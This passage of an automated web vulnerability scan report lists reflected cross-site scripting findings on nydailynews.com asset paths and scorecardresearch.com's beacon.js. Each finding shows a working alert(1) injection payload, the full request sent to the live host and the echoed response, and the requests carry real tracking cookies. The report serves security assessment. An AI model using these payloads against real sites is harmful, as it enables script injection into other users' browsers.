Cookie: __qca=P0-824525508-1312767406537; tmq=kvqD%3DT%3BkvqT%3DT%3Bkvq2789%3DT%3Bkvq2413%3DT%3Bkvq2079%3DT%3Bkvq1129%3DT%3Bkvq1128%3DT%3Bkvq773%3DT; __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/news/index.html; __utma=263866259.953009987.1312767390.1312835786.1313102150.3; __utmb=263866259.3.10.1313102150; __utmc=263866259; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __vry=-1

Response

HTTP/1.1 404 Not Found
Date: Thu, 11 Aug 2011 22:46:02 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Content-Length: 69760
Connection: keep-alive

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 7 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://origin.nydailynews.com/img/2011/08/127529b';alert(1)//3afc937eb48/alg_charla-nash_surgery.jpg';
}
//-->
...[SNIP]...

4.24. http://assets.nydailynews.com/img/2011/08/12/alg_charla-nash_surgery.jpg [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://assets.nydailynews.com
Path:	/img/2011/08/12/alg_charla-nash_surgery.jpg

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4e346'%3balert(1)//86988af10f8 was submitted in the REST URL parameter 5. This input was echoed as 4e346';alert(1)//86988af10f8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /img/2011/08/12/alg_charla-nash_surgery.jpg4e346'%3balert(1)//86988af10f8 HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/news/national/2011/08/11/2011-08-11_charla_nash_woman_disfigured_in_chimp_attack_reveals_new_face_after_20hour_trans.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-824525508-1312767406537; tmq=kvqD%3DT%3BkvqT%3DT%3Bkvq2789%3DT%3Bkvq2413%3DT%3Bkvq2079%3DT%3Bkvq1129%3DT%3Bkvq1128%3DT%3Bkvq773%3DT; __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/news/index.html; __utma=263866259.953009987.1312767390.1312835786.1313102150.3; __utmb=263866259.3.10.1313102150; __utmc=263866259; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __vry=-1

Response

HTTP/1.1 404 Not Found
Date: Thu, 11 Aug 2011 22:46:15 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Content-Length: 69760
Connection: keep-alive

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
dn_ipad', 'yep', { expires: 7 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://origin.nydailynews.com/img/2011/08/12/alg_charla-nash_surgery.jpg4e346';alert(1)//86988af10f8';
}
//-->
...[SNIP]...

4.25. http://assets.nydailynews.com/img/2011/08/12/alg_curtis_granderson.jpg [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://assets.nydailynews.com
Path:	/img/2011/08/12/alg_curtis_granderson.jpg

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58f10'%3balert(1)//25181935610 was submitted in the REST URL parameter 1. This input was echoed as 58f10';alert(1)//25181935610 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /img58f10'%3balert(1)//25181935610/2011/08/12/alg_curtis_granderson.jpg HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/sports/baseball/yankees/2011/08/11/2011-08-11_yankees_can_pound_the_als_least_but_bombers__cc_sabathia_need_to_prove_they_can_.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-824525508-1312767406537; tmq=kvqD%3DT%3BkvqT%3DT%3Bkvq2789%3DT%3Bkvq2413%3DT%3Bkvq2079%3DT%3Bkvq1129%3DT%3Bkvq1128%3DT%3Bkvq773%3DT; __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/sports/index.html; __utma=263866259.953009987.1312767390.1312835786.1313102150.3; __utmb=263866259.5.10.1313102150; __utmc=263866259; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __vry=0

Response

HTTP/1.1 404 Not Found
Date: Thu, 11 Aug 2011 22:46:13 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Content-Length: 69758
Connection: keep-alive

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...

jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 7 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://origin.nydailynews.com/img58f10';alert(1)//25181935610/2011/08/12/alg_curtis_granderson.jpg';
}
//-->
...[SNIP]...

4.26. http://assets.nydailynews.com/img/2011/08/12/alg_curtis_granderson.jpg [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://assets.nydailynews.com
Path:	/img/2011/08/12/alg_curtis_granderson.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b47b8'%3balert(1)//83a63c7b35c was submitted in the REST URL parameter 2. This input was echoed as b47b8';alert(1)//83a63c7b35c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /img/2011b47b8'%3balert(1)//83a63c7b35c/08/12/alg_curtis_granderson.jpg HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/sports/baseball/yankees/2011/08/11/2011-08-11_yankees_can_pound_the_als_least_but_bombers__cc_sabathia_need_to_prove_they_can_.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-824525508-1312767406537; tmq=kvqD%3DT%3BkvqT%3DT%3Bkvq2789%3DT%3Bkvq2413%3DT%3Bkvq2079%3DT%3Bkvq1129%3DT%3Bkvq1128%3DT%3Bkvq773%3DT; __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/sports/index.html; __utma=263866259.953009987.1312767390.1312835786.1313102150.3; __utmb=263866259.5.10.1313102150; __utmc=263866259; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __vry=0

Response

HTTP/1.1 404 Not Found
Date: Thu, 11 Aug 2011 22:46:31 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Content-Length: 69758
Connection: keep-alive

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 7 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://origin.nydailynews.com/img/2011b47b8';alert(1)//83a63c7b35c/08/12/alg_curtis_granderson.jpg';
}
//-->
...[SNIP]...

4.27. http://assets.nydailynews.com/img/2011/08/12/alg_curtis_granderson.jpg [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://assets.nydailynews.com
Path:	/img/2011/08/12/alg_curtis_granderson.jpg

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb460'%3balert(1)//e60c9431fa3 was submitted in the REST URL parameter 3. This input was echoed as bb460';alert(1)//e60c9431fa3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /img/2011/08bb460'%3balert(1)//e60c9431fa3/12/alg_curtis_granderson.jpg HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/sports/baseball/yankees/2011/08/11/2011-08-11_yankees_can_pound_the_als_least_but_bombers__cc_sabathia_need_to_prove_they_can_.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-824525508-1312767406537; tmq=kvqD%3DT%3BkvqT%3DT%3Bkvq2789%3DT%3Bkvq2413%3DT%3Bkvq2079%3DT%3Bkvq1129%3DT%3Bkvq1128%3DT%3Bkvq773%3DT; __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/sports/index.html; __utma=263866259.953009987.1312767390.1312835786.1313102150.3; __utmb=263866259.5.10.1313102150; __utmc=263866259; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __vry=0

Response

HTTP/1.1 404 Not Found
Date: Thu, 11 Aug 2011 22:46:44 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Content-Length: 69758
Connection: keep-alive

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 7 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://origin.nydailynews.com/img/2011/08bb460';alert(1)//e60c9431fa3/12/alg_curtis_granderson.jpg';
}
//-->
...[SNIP]...

4.28. http://assets.nydailynews.com/img/2011/08/12/alg_curtis_granderson.jpg [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://assets.nydailynews.com
Path:	/img/2011/08/12/alg_curtis_granderson.jpg

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66fcf'%3balert(1)//5350e8a8c99 was submitted in the REST URL parameter 4. This input was echoed as 66fcf';alert(1)//5350e8a8c99 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /img/2011/08/1266fcf'%3balert(1)//5350e8a8c99/alg_curtis_granderson.jpg HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/sports/baseball/yankees/2011/08/11/2011-08-11_yankees_can_pound_the_als_least_but_bombers__cc_sabathia_need_to_prove_they_can_.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-824525508-1312767406537; tmq=kvqD%3DT%3BkvqT%3DT%3Bkvq2789%3DT%3Bkvq2413%3DT%3Bkvq2079%3DT%3Bkvq1129%3DT%3Bkvq1128%3DT%3Bkvq773%3DT; __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/sports/index.html; __utma=263866259.953009987.1312767390.1312835786.1313102150.3; __utmb=263866259.5.10.1313102150; __utmc=263866259; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __vry=0

Response

HTTP/1.1 404 Not Found
Date: Thu, 11 Aug 2011 22:46:57 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Content-Length: 69758
Connection: keep-alive

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 7 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://origin.nydailynews.com/img/2011/08/1266fcf';alert(1)//5350e8a8c99/alg_curtis_granderson.jpg';
}
//-->
...[SNIP]...

4.29. http://assets.nydailynews.com/img/2011/08/12/alg_curtis_granderson.jpg [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://assets.nydailynews.com
Path:	/img/2011/08/12/alg_curtis_granderson.jpg

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 59514'%3balert(1)//684607607d8 was submitted in the REST URL parameter 5. This input was echoed as 59514';alert(1)//684607607d8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /img/2011/08/12/alg_curtis_granderson.jpg59514'%3balert(1)//684607607d8 HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/sports/baseball/yankees/2011/08/11/2011-08-11_yankees_can_pound_the_als_least_but_bombers__cc_sabathia_need_to_prove_they_can_.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-824525508-1312767406537; tmq=kvqD%3DT%3BkvqT%3DT%3Bkvq2789%3DT%3Bkvq2413%3DT%3Bkvq2079%3DT%3Bkvq1129%3DT%3Bkvq1128%3DT%3Bkvq773%3DT; __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/sports/index.html; __utma=263866259.953009987.1312767390.1312835786.1313102150.3; __utmb=263866259.5.10.1313102150; __utmc=263866259; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __vry=0

Response

HTTP/1.1 404 Not Found
Date: Thu, 11 Aug 2011 22:47:10 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Content-Length: 69758
Connection: keep-alive

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
nydn_ipad', 'yep', { expires: 7 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://origin.nydailynews.com/img/2011/08/12/alg_curtis_granderson.jpg59514';alert(1)//684607607d8';
}
//-->
...[SNIP]...

4.30. http://assets.nydailynews.com/video/homepage_video.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://assets.nydailynews.com
Path:	/video/homepage_video.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1b465'%3balert(1)//62add0462bb was submitted in the REST URL parameter 1. This input was echoed as 1b465';alert(1)//62add0462bb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /video1b465'%3balert(1)//62add0462bb/homepage_video.html HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-824525508-1312767406537; __utma=263866259.953009987.1312767390.1312767390.1312835786.2; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/index.html

Response

HTTP/1.1 404 Not Found
Date: Thu, 11 Aug 2011 22:35:27 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Vary: Accept-encoding
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 7 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://origin.nydailynews.com/video1b465';alert(1)//62add0462bb/homepage_video.html';
}
//-->
...[SNIP]...

4.31. http://assets.nydailynews.com/video/homepage_video.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://assets.nydailynews.com
Path:	/video/homepage_video.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 299e0'%3balert(1)//bca7c7ba913 was submitted in the REST URL parameter 2. This input was echoed as 299e0';alert(1)//bca7c7ba913 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /video/homepage_video.html299e0'%3balert(1)//bca7c7ba913 HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-824525508-1312767406537; __utma=263866259.953009987.1312767390.1312767390.1312835786.2; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/index.html

Response

HTTP/1.1 404 Not Found
Date: Thu, 11 Aug 2011 22:35:38 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Content-Length: 69743
Connection: keep-alive

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
y.cookie('seen_nydn_ipad', 'yep', { expires: 7 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://origin.nydailynews.com/video/homepage_video.html299e0';alert(1)//bca7c7ba913';
}
//-->
...[SNIP]...

4.32. http://b.scorecardresearch.com/beacon.js [c1 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 93dda<script>alert(1)</script>467cb1231a0 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=793dda<script>alert(1)</script>467cb1231a0&c2=7400849&c3=1&c4=&c5=&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://arfug.groups.adobe.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 07 Sep 2011 16:53:55 GMT
Date: Wed, 31 Aug 2011 16:53:55 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"793dda<script>alert(1)</script>467cb1231a0", c2:"7400849", c3:"1", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

4.33. http://b.scorecardresearch.com/beacon.js [c2 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 4c016<script>alert(1)</script>b6c771243dc was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=74008494c016<script>alert(1)</script>b6c771243dc&c3=1&c4=&c5=&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://arfug.groups.adobe.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 07 Sep 2011 16:53:55 GMT
Date: Wed, 31 Aug 2011 16:53:55 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
on(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"7", c2:"74008494c016<script>alert(1)</script>b6c771243dc", c3:"1", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

4.34. http://b.scorecardresearch.com/beacon.js [c3 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload b4aa1<script>alert(1)</script>31aab40f711 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=7400849&c3=1b4aa1<script>alert(1)</script>31aab40f711&c4=&c5=&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://arfug.groups.adobe.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 07 Sep 2011 16:53:56 GMT
Date: Wed, 31 Aug 2011 16:53:56 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
y{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"7", c2:"7400849", c3:"1b4aa1<script>alert(1)</script>31aab40f711", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

4.35. http://b.scorecardresearch.com/beacon.js [c4 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 45a53<script>alert(1)</script>94d02f8e106 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=7400849&c3=1&c4=45a53<script>alert(1)</script>94d02f8e106&c5=&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://arfug.groups.adobe.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 07 Sep 2011 16:53:56 GMT
Date: Wed, 31 Aug 2011 16:53:56 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"7", c2:"7400849", c3:"1", c4:"45a53<script>alert(1)</script>94d02f8e106", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

4.36. http://b.scorecardresearch.com/beacon.js [c5 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload f715e<script>alert(1)</script>aa1b2251375 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=7400849&c3=1&c4=&c5=f715e<script>alert(1)</script>aa1b2251375&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://arfug.groups.adobe.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 07 Sep 2011 16:53:56 GMT
Date: Wed, 31 Aug 2011 16:53:56 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"7", c2:"7400849", c3:"1", c4:"", c5:"f715e<script>alert(1)</script>aa1b2251375", c6:"", c10:"", c15:"", c16:"", r:""});

4.37. http://b.scorecardresearch.com/beacon.js [c6 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 71b02<script>alert(1)</script>f6273d72731 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=7400849&c3=1&c4=&c5=&c6=71b02<script>alert(1)</script>f6273d72731 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
